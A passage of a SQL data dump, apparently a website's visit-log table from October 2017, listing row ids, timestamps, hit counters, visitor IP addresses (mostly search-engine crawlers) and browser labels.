170112,1508892022,1,0,1,0,'66.249.69.157',''),(170113,1508892139,1,1,0,0,'51.255.65.7','other'),(170114,1508892310,1,1,0,0,'51.255.65.75','other'),(170115,1508892427,1,1,0,0,'217.182.132.180','other'),(170116,1508892757,1,1,0,0,'178.154.171.88','other'),(170117,1508892881,1,1,0,0,'51.255.65.71','other'),(170118,1508892968,1,1,0,0,'198.37.118.38','firefox'),(170119,1508893212,1,1,0,0,'51.255.65.2','other'),(170120,1508893249,1,1,0,0,'87.250.224.46','other'),(170121,1508893277,1,1,0,0,'66.249.69.158','chrome'),(170122,1508893500,2,2,0,0,'54.165.59.7','other'),(170123,1508893522,2,2,0,0,'141.8.142.74','other'),(170124,1508893686,1,1,0,0,'217.182.132.185','other'),(170125,1508893860,1,1,0,0,'51.255.65.29','other'),(170126,1508893923,1,1,0,0,'137.74.207.120','other'),(170127,1508894064,1,1,0,0,'137.74.207.116','other'),(170128,1508894100,1,1,0,0,'217.182.132.66','other'),(170129,1508894208,1,1,0,0,'51.255.65.69','other'),(170130,1508895635,1,1,0,0,'51.255.71.114','other'),(170131,1508895669,2,2,0,0,'141.8.142.74','other'),(170132,1508896000,1,1,0,0,'217.182.132.154','other'),(170133,1508896399,1,1,0,0,'137.74.207.109','other'),(170134,1508896740,1,1,0,0,'178.154.171.88','other'),(170135,1508896750,1,1,0,0,'51.255.65.48','other'),(170136,1508897075,1,1,0,0,'188.255.50.81','msie'),(170137,1508897124,1,1,0,0,'217.182.132.82','other'),(170138,1508897127,1,0,1,0,'66.249.64.28',''),(170139,1508897299,1,1,0,0,'141.8.142.74','other'),(170140,1508897551,1,1,0,0,'217.182.132.193','other'),(170141,1508897560,1,1,0,0,'66.249.64.30','chrome'),(170142,1508897744,1,1,0,0,'51.255.65.78','other'),(170143,1508897784,1,1,0,0,'95.24.93.85','msie'),(170144,1508898176,1,0,1,0,'66.249.64.28',''),(170145,1508898238,1,1,0,0,'217.182.132.90','other'),(170146,1508898932,1,1,0,0,'95.220.115.137','msie'),(170147,1508899347,1,1,0,0,'66.249.64.30','chrome'),(170148,1508899603,1,1,0,0,'217.182.132.85','other'),(170149,1508899666,1,0,1,0,'66.249.70.29',''),(170150,1508899764,1,1,0,0,'66.249.70.27','chrome'),(170151,1508899824,1,1,0,0,'217.69.133.238','other'),(170152,1508899964,1,1,0,0,'217.182.132.187','other'),(170153,1508899976,1,1,0,0,'141.8.142.74','other'),(170154,1508900178,1,1,0,0,'51.255.65.29','other'),(170155,1508900632,1,0,1,0,'66.249.70.29',''),(170156,1508900871,1,1,0,0,'51.255.65.31','other'),(170157,1508901335,1,1,0,0,'180.76.15.139','other'),(170158,1508902043,1,1,0,0,'217.69.133.67','other'),(170159,1508902542,1,1,0,0,'8.29.198.25','other'),(170160,1508902805,1,1,0,0,'51.255.65.78','other'),(170161,1508903062,2,2,0,0,'217.182.132.83','other'),(170162,1508903963,1,1,0,0,'141.8.142.74','other'),(170163,1508904192,1,1,0,0,'217.182.132.70','other'),(170164,1508904196,1,1,0,0,'217.69.136.208','other'),(170165,1508904864,1,1,0,0,'188.255.50.81','msie'),(170166,1508904927,1,1,0,0,'51.255.65.78','other'),(170167,1508905310,1,1,0,0,'5.166.136.24','msie'),(170168,1508906663,1,1,0,0,'95.220.115.137','msie'),(170169,1508906682,1,1,0,0,'109.63.187.114','msie'),(170170,1508906800,1,1,0,0,'217.69.133.253','other'),(170171,1508907763,1,1,0,0,'51.255.65.17','other'),(170172,1508907847,1,0,1,0,'66.249.64.30',''),(170173,1508908082,1,1,0,0,'217.182.132.83','other'),(170174,1508908195,1,1,0,0,'91.196.178.68','firefox'),(170175,1508908663,1,1,0,0,'37.9.113.134','other'),(170176,1508908770,1,1,0,0,'217.182.132.6','other'),(170177,1508908797,1,1,0,0,'217.182.132.190','other'),(170178,1508909307,1,1,0,0,'164.132.162.154','other'),(170179,1508909564,1,1,0,0,'91.196.178.71','chrome'),(170180,1508909983,1,1,0,0,'51.255.71.120','other'),(170181,1508910323,1,1,0,0,'164.132.162.158','other'),(170182,1508910332,1,1,0,0,'91.196.178.72','chrome'),(170183,1508910493,1,1,0,0,'178.154.171.88','other'),(170184,1508910889,1,1,0,0,'217.182.132.59','other'),(170185,1508911267,1,1,0,0,'64.120.56.210','other'),(170186,1508911455,1,1,0,0,'91.196.178.67','chrome'),(170187,1508911469,1,1,0,0,'91.196.178.68','chrome'),(170188,1508911578,1,0,1,0,'66.249.64.30',''),(170189,1508911654,1,1,0,0,'217.69.133.12','other'),(170190,1508911865,1,1,0,0,'188.255.50.81','msie'),(170191,1508912225,1,1,0,0,'51.255.71.101','other'),(170192,1508912282,1,1,0,0,'217.182.132.97','other'),(170193,1508912328,1,1,0,0,'51.255.65.74','other'),(170194,1508912332,1,1,0,0,'78.111.186.175','firefox'),(170195,1508912601,1,1,0,0,'5.166.136.24','msie'),(170196,1508912800,1,1,0,0,'137.74.207.114','other'),(170197,1508913390,1,1,0,0,'8.29.198.26','other'),(170198,1508913392,1,1,0,0,'178.154.171.88','other'),(170199,1508913473,1,1,0,0,'137.74.207.116','other'),(170200,1508913675,1,1,0,0,'217.182.132.31','other'),(170201,1508913748,1,1,0,0,'109.63.187.114','msie'),(170202,1508913768,1,1,0,0,'95.220.115.137','msie'),(170203,1508913902,1,1,0,0,'51.255.65.55','other'),(170204,1508913926,1,0,1,0,'66.249.70.29',''),(170205,1508913989,1,1,0,0,'92.112.35.236','chrome'),(170206,1508914578,1,1,0,0,'91.124.56.229','chrome'),(170207,1508914704,1,1,0,0,'51.255.65.13','other'),(170208,1508914940,1,1,0,0,'46.101.156.190','other'),(170209,1508915119,1,1,0,0,'217.182.132.150','other'),(170210,1508915577,1,1,0,0,'178.154.171.88','other'),(170211,1508916258,1,1,0,0,'217.69.133.241','other'),(170212,1508916407,1,1,0,0,'141.8.142.74','other'),(170213,1508916902,1,1,0,0,'82.207.91.234','other'),(170214,1508917143,1,1,0,0,'217.69.133.68','other'),(170215,1508917366,1,1,0,0,'51.255.65.66','other'),(170216,1508917391,1,0,1,0,'66.249.64.28',''),(170217,1508917717,1,1,0,0,'51.255.65.74','other'),(170218,1508918763,1,1,0,0,'51.255.71.115','other'),(170219,1508918984,1,1,0,0,'217.69.133.59','other'),(170220,1508919149,1,1,0,0,'51.255.65.7','other'),(170221,1508919202,1,1,0,0,'188.255.50.81','msie'),(170222,1508919536,1,1,0,0,'217.69.133.250','other'),(170223,1508919591,1,1,0,0,'164.132.162.157','other'),(170224,1508919695,2,2,0,0,'141.8.142.74','other'),(170225,1508919803,1,1,0,0,'217.182.132.84','other'),(170226,1508920349,1,1,0,0,'123.126.113.104','other'),(170227,1508920585,1,0,1,0,'66.249.70.27',''),(170228,1508920853,1,1,0,0,'95.220.115.137','msie'),(170229,1508921044,1,1,0,0,'40.77.167.126','other'),(170230,1508921195,1,1,0,0,'141.8.142.74','other'),(170231,1508921280,1,1,0,0,'109.63.187.114','msie'),(170232,1508921538,1,1,0,0,'31.43.6.212','chrome'),(170233,1508921594,1,1,0,0,'178.93.18.79','chrome'),(170234,1508921603,1,1,0,0,'217.182.132.176','other'),(170235,1508921752,1,1,0,0,'51.255.65.44','other'),(170236,1508921851,1,1,0,0,'217.182.132.31','other'),(170237,1508922047,1,1,0,0,'217.182.132.64','other'),(170238,1508922053,1,1,0,0,'217.182.132.190','other'),(170239,1508922236,1,1,0,0,'164.132.162.154','other'),(170240,1508922425,1,1,0,0,'51.255.65.34','other'),(170241,1508922525,1,1,0,0,'217.182.132.66','other'),(170242,1508922526,1,1,0,0,'217.182.132.191','other'),(170243,1508922560,1,1,0,0,'82.207.91.234','other'),(170244,1508922922,1,1,0,0,'163.172.255.19','chrome'),(170245,1508922988,1,1,0,0,'66.249.64.30','chrome'),(170246,1508923001,1,0,1,0,'66.249.70.25',''),(170247,1508923007,1,1,0,0,'66.249.70.27','chrome'),(170248,1508923421,1,1,0,0,'188.190.0.162','chrome'),(170249,1508923559,1,1,0,0,'217.182.132.184','other'),(170250,1508923797,1,1,0,0,'51.255.71.113','other'),(170251,1508924244,1,1,0,0,'8.29.198.27','other'),(170252,1508924386,8,8,0,0,'173.212.239.162','other'),(170253,1508924690,1,1,0,0,'89.163.131.166','firefox'),(170254,1508924771,1,1,0,0,'51.255.65.91','other'),(170255,1508924845,1,1,0,0,'217.182.132.64','other'),(170256,1508924934,1,1,0,0,'91.196.179.138','firefox'),(170257,1508925035,1,1,0,0,'217.182.132.172','other'),(170258,1508925037,1,1,0,0,'91.196.178.68','chrome'),(170259,1508925152,1,1,0,0,'217.182.132.147','other'),(170260,1508925378,1,1,0,0,'40.77.167.124','other'),(170261,1508925539,1,1,0,0,'91.196.177.46','firefox'),(170262,1508926805,1,1,0,0,'51.255.65.22','other'),(170263,1508927074,1,1,0,0,'217.182.132.88','other'),(170264,1508927277,1,1,0,0,'217.182.132.176','other'),(170265,1508927656,1,1,0,0,'95.132.25.186','chrome'),(170266,1508927864,1,1,0,0,'188.255.50.81','msie'),(170267,1508928184,1,1,0,0,'217.182.132.187','other'),(170268,1508928356,1,1,0,0,'51.255.65.28','other'),(170269,1508928488,1,1,0,0,'130.180.220.51','chrome'),(170270,1508928519,1,1,0,0,'217.69.133.220','other'),(170271,1508928629,1,1,0,0,'5.166.136.24','msie'),(170272,1508929166,1,1,0,0,'217.69.133.216','other'),(170273,1508929226,1,0,1,0,'66.249.64.30',''),(170274,1508929343,1,1,0,0,'164.132.162.153','other'),(170275,1508929586,1,1,0,0,'217.182.132.76','other'),(170276,1508929700,1,1,0,0,'95.220.115.137','msie'),(170277,1508929703,1,1,0,0,'217.182.132.21','other'),(170278,1508929735,1,1,0,0,'109.63.187.114','msie'),(170279,1508929894,1,1,0,0,'217.69.133.228','other'),(170280,1508930056,1,1,0,0,'51.255.71.119','other'),(170281,1508930293,1,1,0,0,'193.108.50.39','chrome'),(170282,1508930385,1,1,0,0,'217.182.132.171','other'),(170283,1508930677,1,1,0,0,'162.210.196.129','other'),(170284,1508931800,1,1,0,0,'164.132.162.157','other'),(170285,1508931813,1,1,0,0,'66.249.64.29','chrome'),(170286,1508931833,1,0,1,0,'66.249.70.25',''),(170287,1508931839,1,1,0,0,'66.249.70.27','chrome'),(170288,1508932050,1,1,0,0,'95.132.2.104','firefox'),(170289,1508932220,1,1,0,0,'91.196.178.71','chrome'),(170290,1508932247,1,1,0,0,'91.196.178.163','chrome'),(170291,1508932874,1,1,0,0,'51.255.71.125','other'),(170292,1508932976,1,1,0,0,'137.74.207.164','other'),(170293,1508933019,1,1,0,0,'216.244.66.237','other'),(170294,1508933225,1,0,1,0,'66.249.64.30',''),(170295,1508933385,1,1,0,0,'51.255.65.61','other'),(170296,1508933737,1,1,0,0,'87.250.224.46','other'),(170297,1508933855,1,1,0,0,'51.255.65.12','other'),(170298,1508933888,1,1,0,0,'217.69.133.191','other'),(170299,1508934328,1,1,0,0,'66.249.64.28','chrome'),(170300,1508934367,1,1,0,0,'217.182.132.29','other'),(170301,1508935085,1,1,0,0,'8.29.198.25','other'),(170302,1508935244,1,1,0,0,'91.196.179.138','firefox'),(170303,1508935453,1,1,0,0,'137.74.207.116','other'),(170304,1508935490,1,1,0,0,'188.255.50.81','msie'),(170305,1508935573,1,1,0,0,'92.112.104.222','chrome'),(170306,1508935874,1,1,0,0,'5.166.136.24','msie'),(170307,1508936086,1,1,0,0,'91.196.178.134','chrome'),(170308,1508936143,1,1,0,0,'216.244.66.237','other'),(170309,1508936389,2,2,0,0,'91.209.11.236','other'),(170310,1508936645,1,1,0,0,'91.196.178.71','chrome'),(170311,1508937004,1,1,0,0,'217.182.132.71','other'),(170312,1508937195,1,1,0,0,'95.220.115.137','msie'),(170313,1508937366,1,1,0,0,'217.182.132.241','other'),(170314,1508937394,1,1,0,0,'109.63.187.114','msie'),(170315,1508937996,1,1,0,0,'91.196.179.138','firefox'),(170316,1508937997,1,1,0,0,'91.196.178.71','chrome'),(170317,1508938564,1,0,1,0,'66.249.70.29',''),(170318,1508939183,1,1,0,0,'217.182.132.95','other'),(170319,1508939865,1,1,0,0,'51.255.71.98','other'),(170320,1508940151,1,1,0,0,'91.196.178.67','chrome'),(170321,1508940323,1,1,0,0,'51.255.65.16','other'),(170322,1508940349,1,1,0,0,'91.196.178.68','chrome'),(170323,1508940740,1,1,0,0,'217.182.132.70','other'),(170324,1508941904,1,1,0,0,'217.69.133.13','other'),(170325,1508941999,1,1,0,0,'151.80.27.116','other'),(170326,1508942069,2,2,0,0,'217.182.132.82','other'),(170327,1508942124,1,1,0,0,'51.255.71.122','other'),(170328,1508942618,1,1,0,0,'137.74.201.108','other'),(170329,1508942649,1,1,0,0,'137.74.207.161','other'),(170330,1508942752,1,1,0,0,'217.182.132.157','other'),(170331,1508943051,1,1,0,0,'217.182.132.24','other'),(170332,1508943490,1,0,1,0,'66.249.64.30',''),(170333,1508943526,1,1,0,0,'46.201.113.62','chrome'),(170334,1508943651,1,1,0,0,'163.172.255.19','chrome'),(170335,1508943925,1,1,0,0,'51.255.65.75','other'),(170336,1508944088,1,1,0,0,'188.255.50.81','msie'),(170337,1508945335,1,1,0,0,'67.215.230.82','other'),(170338,1508945535,1,1,0,0,'194.44.63.103','chrome'),(170339,1508945742,1,1,0,0,'95.220.115.137','msie'),(170340,1508945928,1,1,0,0,'8.29.198.25','other'),(170341,1508946317,1,1,0,0,'51.255.65.40','other'),(170342,1508946418,1,0,1,0,'66.249.64.29',''),(170343,1508946729,1,1,0,0,'40.77.167.60','other'),(170344,1508946802,1,1,0,0,'51.255.65.39','other'),(170345,1508946989,1,1,0,0,'109.63.187.114','msie'),(170346,1508947146,1,1,0,0,'217.182.132.75','other'),(170347,1508947890,1,1,0,0,'217.69.136.205','other'),(170348,1508949465,1,1,0,0,'217.182.132.93','other'),(170349,1508949613,1,1,0,0,'157.55.39.157','other'),(170350,1508949822,1,1,0,0,'217.182.132.183','other'),(170351,1508949982,1,1,0,0,'217.182.132.153','other'),(170352,1508951574,1,1,0,0,'217.69.133.28','other'),(170353,1508951631,3,3,0,0,'46.229.168.80','other'),(170354,1508951653,8,8,0,0,'46.229.168.74','other'),(170355,1508951667,4,4,0,0,'46.229.168.71','other'),(170356,1508951686,4,4,0,0,'46.229.168.79','other'),(170357,1508951691,1,1,0,0,'51.255.65.65','other'),(170358,1508951707,5,5,0,0,'46.229.168.73','other'),(170359,1508951731,1,1,0,0,'188.255.50.81','msie'),(170360,1508951762,1,1,0,0,'217.182.132.192','other'),(170361,1508951777,3,3,0,0,'46.229.168.75','other'),(170362,1508951800,3,3,0,0,'46.229.168.76','other'),(170363,1508951874,8,8,0,0,'46.229.168.77','other'),(170364,1508951937,10,10,0,0,'46.229.168.66','other'),(170365,1508951942,3,3,0,0,'46.229.168.72','other'),(170366,1508951958,1,1,0,0,'51.255.65.33','other'),(170367,1508952060,5,5,0,0,'46.229.168.78','other'),(170368,1508952102,4,4,0,0,'46.229.168.69','other'),(170369,1508952144,10,10,0,0,'46.229.168.70','other'),(170370,1508952187,1,1,0,0,'5.166.136.24','msie'),(170371,1508952204,6,6,0,0,'46.229.168.67','other'),(170372,1508952501,3,3,0,0,'46.229.168.68','other'),(170373,1508952517,5,5,0,0,'46.229.168.65','other'),(170374,1508952629,3,3,0,0,'46.229.168.74','other'),(170375,1508952650,1,1,0,0,'40.77.167.124','other'),(170376,1508952677,2,2,0,0,'46.229.168.79','other'),(170377,1508952716,4,4,0,0,'46.229.168.75','other'),(170378,1508952745,1,1,0,0,'91.196.178.71','firefox'),(170379,1508952857,1,1,0,0,'193.194.127.222','firefox'),(170380,1508952865,5,5,0,0,'46.229.168.77','other'),(170381,1508952876,1,1,0,0,'51.255.65.79','other'),(170382,1508952972,7,7,0,0,'46.229.168.71','other'),(170383,1508953038,4,4,0,0,'46.229.168.76','other'),(170384,1508953061,4,4,0,0,'46.229.168.69','other'),(170385,1508953098,6,6,0,0,'46.229.168.70','other'),(170386,1508953209,3,3,0,0,'46.229.168.73','other'),(170387,1508953248,3,3,0,0,'46.229.168.66','other'),(170388,1508953267,7,7,0,0,'46.229.168.72','other'),(170389,1508953314,5,5,0,0,'46.229.168.67','other'),(170390,1508953323,1,1,0,0,'95.220.115.137','msie'),(170391,1508953409,4,4,0,0,'46.229.168.68','other'),(170392,1508953425,7,7,0,0,'46.229.168.80','other'),(170393,1508953443,5,5,0,0,'46.229.168.65','other'),(170394,1508953597,1,1,0,0,'46.229.168.78','other'),(170395,1508953625,3,3,0,0,'46.229.168.75','other'),(170396,1508953657,1,1,0,0,'109.63.187.114','msie'),(170397,1508953886,2,2,0,0,'46.229.168.74','other'),(170398,1508953916,5,5,0,0,'46.229.168.79','other'),(170399,1508953925,1,0,1,0,'66.249.70.25',''),(170400,1508953970,2,2,0,0,'46.229.168.69','other'),(170401,1508954062,1,1,0,0,'178.92.156.237','chrome'),(170402,1508954268,1,1,0,0,'51.255.65.62','other'),(170403,1508954282,6,6,0,0,'46.229.168.73','other'),(170404,1508954340,5,5,0,0,'46.229.168.80','other'),(170405,1508954354,2,2,0,0,'46.229.168.68','other'),(170406,1508954372,4,4,0,0,'46.229.168.67','other'),(170407,1508954395,2,2,0,0,'46.229.168.72','other'),(170408,1508954408,3,3,0,0,'46.229.168.71','other'),(170409,1508954527,6,6,0,0,'46.229.168.70','other'),(170410,1508954560,3,3,0,0,'46.229.168.65','other'),(170411,1508954581,3,3,0,0,'46.229.168.75','other'),(170412,1508954603,7,7,0,0,'46.229.168.66','other'),(170413,1508954650,5,5,0,0,'46.229.168.76','other'),(170414,1508954681,3,3,0,0,'46.229.168.77','other'),(170415,1508954758,1,1,0,0,'212.1.93.97','firefox'),(170416,1508954861,5,5,0,0,'46.229.168.78','other'),(170417,1508954927,8,8,0,0,'46.229.168.69','other'),(170418,1508954944,5,5,0,0,'46.229.168.79','other'),(170419,1508954993,1,1,0,0,'137.74.207.110','other'),(170420,1508955199,5,5,0,0,'46.229.168.73','other'),(170421,1508955289,4,4,0,0,'46.229.168.67','other'),(170422,1508955308,2,2,0,0,'46.229.168.80','other'),(170423,1508955399,3,3,0,0,'46.229.168.74','other'),(170424,1508955494,4,4,0,0,'46.229.168.75','other'),(170425,1508955566,2,2,0,0,'46.229.168.66','other'),(170426,1508955616,2,2,0,0,'46.229.168.72','other'),(170427,1508955624,1,1,0,0,'46.229.168.68','other'),(170428,1508955636,3,3,0,0,'46.229.168.76','other'),(170429,1508955654,2,2,0,0,'46.229.168.65','other'),(170430,1508955791,1,1,0,0,'46.229.168.70','other'),(170431,1508955834,1,1,0,0,'217.182.132.177','other'),(170432,1508955919,1,1,0,0,'46.229.168.71','other'),(170433,1508955971,1,1,0,0,'46.229.168.79','other'),(170434,1508955976,1,1,0,0,'217.182.132.20','other'),(170435,1508955979,1,1,0,0,'51.255.65.61','other'),(170436,1508956100,1,1,0,0,'195.238.117.139','chrome'),(170437,1508956334,1,1,0,0,'217.182.132.170','other'),(170438,1508956501,1,1,0,0,'51.255.65.96','other'),(170439,1508956762,1,1,0,0,'51.255.65.41','other'),(170440,1508956781,1,1,0,0,'8.29.198.27','other'),(170441,1508956835,1,1,0,0,'51.255.65.15','other'),(170442,1508956872,1,1,0,0,'51.255.65.44','other'),(170443,1508956892,1,1,0,0,'141.8.142.74','other'),(170444,1508956904,1,1,0,0,'95.132.90.250','firefox'),(170445,1508957420,1,1,0,0,'217.182.132.25','other'),(170446,1508957759,1,1,0,0,'217.182.132.55','other'),(170447,1508958080,1,1,0,0,'180.76.15.142','other'),(170448,1508958453,1,1,0,0,'66.249.70.27','chrome'),(170449,1508958906,1,1,0,0,'188.255.50.81','msie'),(170450,1508958989,1,1,0,0,'137.74.201.100','other'),(170451,1508959520,1,1,0,0,'5.166.136.24','msie'),(170452,1508959941,1,1,0,0,'91.196.178.161','chrome'),(170453,1508960445,1,1,0,0,'51.255.71.119','other'),(170454,1508960478,1,1,0,0,'176.113.170.104','chrome'),(170455,1508960543,1,1,0,0,'95.220.115.137','msie'),(170456,1508960633,1,1,0,0,'51.255.65.40','other'),(170457,1508960768,1,1,0,0,'217.182.132.154','other'),(170458,1508960859,1,1,0,0,'109.63.187.114','msie'),(170459,1508961244,1,1,0,0,'66.249.70.27','chrome'),(170460,1508961333,1,1,0,0,'217.182.132.6','other'),(170461,1508961762,1,1,0,0,'216.244.66.237','other'),(170462,1508961803,1,1,0,0,'217.182.132.148','other'),(170463,1508962253,1,1,0,0,'82.145.220.37','chrome'),(170464,1508962264,1,1,0,0,'137.74.201.108','other'),(170465,1508962556,1,1,0,0,'217.182.132.96','other'),(170466,1508962659,1,1,0,0,'51.255.65.56','other'),(170467,1508962930,1,1,0,0,'217.69.133.67','other'),(170468,1508962942,1,0,1,0,'66.249.64.30',''),(170469,1508963475,1,1,0,0,'51.255.65.42','other'),(170470,1508964103,1,1,0,0,'51.255.71.125','other'),(170471,1508964856,1,1,0,0,'51.255.65.95','other'),(170472,1508965105,1,1,0,0,'217.182.132.36','other'),(170473,1508965583,1,1,0,0,'51.255.71.133','other'),(170474,1508965940,1,1,0,0,'217.182.132.171','other'),(170475,1508966157,1,1,0,0,'217.182.132.5','other'),(170476,1508966579,1,1,0,0,'217.182.132.152','other'),(170477,1508966741,1,1,0,0,'217.182.132.60','other'),(170478,1508967113,1,1,0,0,'188.255.50.81','msie'),(170479,1508967593,1,1,0,0,'141.8.142.74','other'),(170480,1508967627,1,1,0,0,'8.29.198.27','other'),(170481,1508968159,1,1,0,0,'217.182.132.147','other'),(170482,1508968287,1,1,0,0,'178.154.200.32','other'),(170483,1508968392,1,1,0,0,'95.24.93.85','msie'),(170484,1508968888,1,1,0,0,'95.220.116.215','msie'),(170485,1508968921,1,1,0,0,'217.182.132.177','other'),(170486,1508968969,1,1,0,0,'217.182.132.172','other'),(170487,1508969066,1,1,0,0,'109.63.187.114','msie'),(170488,1508969102,1,1,0,0,'217.182.132.154','other'),(170489,1508969798,1,1,0,0,'217.69.133.224','other'),(170490,1508970345,1,1,0,0,'51.255.65.42','other'),(170491,1508970832,1,1,0,0,'51.255.65.70','other'),(170492,1508971084,1,1,0,0,'217.182.132.180','other'),(170493,1508973052,1,1,0,0,'217.69.133.245','other'),(170494,1508973728,1,1,0,0,'217.182.132.59','other'),(170495,1508973798,1,1,0,0,'217.182.132.6','other'),(170496,1508974042,1,1,0,0,'217.182.132.76','other'),(170497,1508974312,1,1,0,0,'51.255.65.51','other'),(170498,1508974584,1,1,0,0,'87.250.224.46','other'),(170499,1508974947,1,1,0,0,'51.255.65.12','other'),(170500,1508975216,1,1,0,0,'188.255.50.81','msie'),(170501,1508975314,1,1,0,0,'51.255.71.100','other'),(170502,1508975346,1,1,0,0,'51.255.65.44','other'),(170503,1508975365,1,1,0,0,'217.182.132.50','other'),(170504,1508975379,1,1,0,0,'157.55.39.157','other'),(170505,1508975435,1,1,0,0,'51.255.65.47','other'),(170506,1508975499,1,1,0,0,'5.164.90.73','msie'),(170507,1508975801,1,1,0,0,'180.76.15.149','other'),(170508,1508975998,1,1,0,0,'217.182.132.93','other'),(170509,1508976090,1,1,0,0,'217.69.136.204','other'),(170510,1508976770,1,1,0,0,'95.220.116.215','msie'),(170511,1508976953,1,1,0,0,'51.255.65.69','other'),(170512,1508976956,1,1,0,0,'109.63.187.114','msie'),(170513,1508977077,1,1,0,0,'51.255.65.3','other'),(170514,1508978131,1,1,0,0,'217.182.132.185','other'),(170515,1508978215,1,1,0,0,'217.182.132.79','other'),(170516,1508978475,1,1,0,0,'8.29.198.27','other'),(170517,1508978572,1,1,0,0,'217.69.133.227','other'),(170518,1508978584,1,1,0,0,'87.250.224.85','other'),(170519,1508978719,1,1,0,0,'51.255.65.61','other'),(170520,1508978840,1,1,0,0,'40.77.167.60','other'),(170521,1508978847,1,1,0,0,'51.255.71.130','other'),(170522,1508979072,1,1,0,0,'51.255.65.94','other'),(170523,1508979514,1,1,0,0,'164.132.162.160','other'),(170524,1508980017,1,1,0,0,'66.102.9.29','chrome'),(170525,1508980164,1,1,0,0,'217.69.133.30','other'),(170526,1508980199,1,1,0,0,'51.255.65.59','other'),(170527,1508980536,1,1,0,0,'217.182.132.188','other'),(170528,1508981687,1,1,0,0,'51.255.65.63','other'),(170529,1508982044,1,1,0,0,'217.182.132.22','other'),(170530,1508982263,1,1,0,0,'51.255.65.13','other'),(170531,1508982307,1,1,0,0,'37.9.113.134','other'),(170532,1508982459,1,1,0,0,'217.182.132.179','other'),(170533,1508982472,1,1,0,0,'51.255.65.51','other'),(170534,1508982592,1,1,0,0,'51.255.65.50','other'),(170535,1508983413,1,1,0,0,'137.74.207.116','other'),(170536,1508983986,1,1,0,0,'51.255.65.13','other'),(170537,1508984101,1,1,0,0,'217.182.132.180','other'),(170538,1508984153,1,1,0,0,'217.182.132.66','other'),(170539,1508984475,1,1,0,0,'5.164.90.73','msie'),(170540,1508984538,1,1,0,0,'217.182.132.84','other'),(170541,1508984703,1,1,0,0,'217.182.132.157','other'),(170542,1508985115,1,1,0,0,'51.255.65.49','other'),(170543,1508985128,1,1,0,0,'51.255.65.64','other'),(170544,1508985474,1,1,0,0,'95.220.116.215','msie'),(170545,1508985966,2,2,0,0,'217.69.133.13','other'),(170546,1508985969,1,1,0,0,'217.182.132.176','other'),(170547,1508986833,1,1,0,0,'217.69.133.222','other'),(170548,1508987835,1,1,0,0,'217.182.132.69','other'),(170549,1508988037,1,1,0,0,'37.9.113.110','other'),(170550,1508988352,1,1,0,0,'217.182.132.50','other'),(170551,1508989317,1,1,0,0,'8.29.198.27','other'),(170552,1508989856,1,1,0,0,'217.182.132.53','other'),(170553,1508989970,1,1,0,0,'51.255.65.77','other'),(170554,1508990030,1,1,0,0,'157.55.39.157','other'),(170555,1508990466,1,1,0,0,'37.9.113.138','other'),(170556,1508991207,1,1,0,0,'188.255.50.81','msie'),(170557,1508991268,1,1,0,0,'51.255.65.92','other'),(170558,1508991627,1,1,0,0,'164.132.164.180','other'),(170559,1508991822,1,1,0,0,'5.164.90.73','msie'),(170560,1508991926,1,1,0,0,'217.182.132.184','other'),(170561,1508992376,1,1,0,0,'164.132.162.156','other'),(170562,1508992447,1,1,0,0,'216.244.66.237','other'),(170563,1508992886,1,1,0,0,'95.220.116.215','msie'),(170564,1508993081,1,1,0,0,'109.63.187.114','msie'),(170565,1508993161,1,1,0,0,'51.255.65.83','other'),(170566,1508994120,1,1,0,0,'217.182.132.76','other'),(170567,1508994377,1,1,0,0,'37.9.113.110','other'),(170568,1508994664,1,1,0,0,'51.255.65.7','other'),(170569,1508995096,1,1,0,0,'217.182.132.34','other'),(170570,1508995121,1,1,0,0,'51.255.71.120','other'),(170571,1508995624,1,1,0,0,'176.113.170.104','chrome'),(170572,1508995908,1,1,0,0,'141.8.142.50','other'),(170573,1508996267,1,1,0,0,'51.255.65.45','other'),(170574,1508996466,1,1,0,0,'91.196.178.67','chrome'),(170575,1508996641,1,1,0,0,'51.255.65.7','other'),(170576,1508996760,1,1,0,0,'217.182.132.31','other'),(170577,1508996841,1,1,0,0,'151.80.27.116','other'),(170578,1508997565,1,1,0,0,'141.8.142.74','other'),(170579,1508997578,1,1,0,0,'51.255.71.121','other'),(170580,1508997743,1,1,0,0,'137.74.207.164','other'),(170581,1508998082,1,1,0,0,'91.196.178.67','chrome'),(170582,1508998109,1,1,0,0,'51.255.65.19','other'),(170583,1508998218,1,1,0,0,'217.182.132.183','other'),(170584,1508998643,1,1,0,0,'37.9.113.132','other'),(170585,1508998842,1,1,0,0,'51.255.65.4','other'),(170586,1508999071,1,1,0,0,'51.255.71.123','other'),(170587,1508999144,2,2,0,0,'87.250.224.46','other'),(170588,1508999175,1,1,0,0,'51.255.65.18','other'),(170589,1508999266,1,1,0,0,'51.255.65.11','other'),(170590,1508999365,1,1,0,0,'178.154.171.55','other'),(170591,1508999369,1,1,0,0,'178.154.171.24','other'),(170592,1508999686,1,1,0,0,'37.9.113.134','other'),(170593,1508999824,1,1,0,0,'217.182.132.82','other'),(170594,1508999986,1,1,0,0,'91.196.178.67','chrome'),(170595,1509000057,1,1,0,0,'188.255.50.81','msie'),(170596,1509000163,1,1,0,0,'8.29.198.26','other'),(170597,1509000212,1,1,0,0,'51.255.64.106','other'),(170598,1509000498,1,1,0,0,'5.164.90.73','msie'),(170599,1509000607,1,1,0,0,'91.196.177.46','firefox'),(170600,1509000658,1,1,0,0,'51.255.65.51','other'),(170601,1509000703,1,1,0,0,'51.255.65.47','other'),(170602,1509000720,1,1,0,0,'91.196.179.138','chrome'),(170603,1509000928,1,1,0,0,'217.69.133.229','other'),(170604,1509001304,1,1,0,0,'51.255.71.101','other'),(170605,1509001332,1,1,0,0,'51.255.65.87','other'),(170606,1509001409,1,1,0,0,'217.182.132.53','other'),(170607,1509001522,1,1,0,0,'95.220.116.215','msie'),(170608,1509001612,1,1,0,0,'91.196.178.67','chrome'),(170609,1509001803,1,1,0,0,'109.63.187.114','msie'),(170610,1509001878,1,1,0,0,'51.255.65.92','other'),(170611,1509001993,1,1,0,0,'217.182.132.95','other'),(170612,1509002014,1,1,0,0,'91.196.178.71','chrome'),(170613,1509002056,1,1,0,0,'91.217.66.22','chrome'),(170614,1509002765,1,1,0,0,'51.255.65.69','other'),(170615,1509002877,1,1,0,0,'217.182.132.170','other'),(170616,1509003409,1,1,0,0,'51.255.65.14','other'),(170617,1509003603,1,1,0,0,'40.77.167.109','other'),(170618,1509004013,1,0,1,0,'66.249.64.29',''),(170619,1509004167,1,1,0,0,'91.196.178.167','chrome'),(170620,1509004263,1,1,0,0,'217.182.132.88','other'),(170621,1509005496,1,1,0,0,'51.255.65.7','other'),(170622,1509005987,1,1,0,0,'217.182.132.147','other'),(170623,1509006077,1,1,0,0,'51.2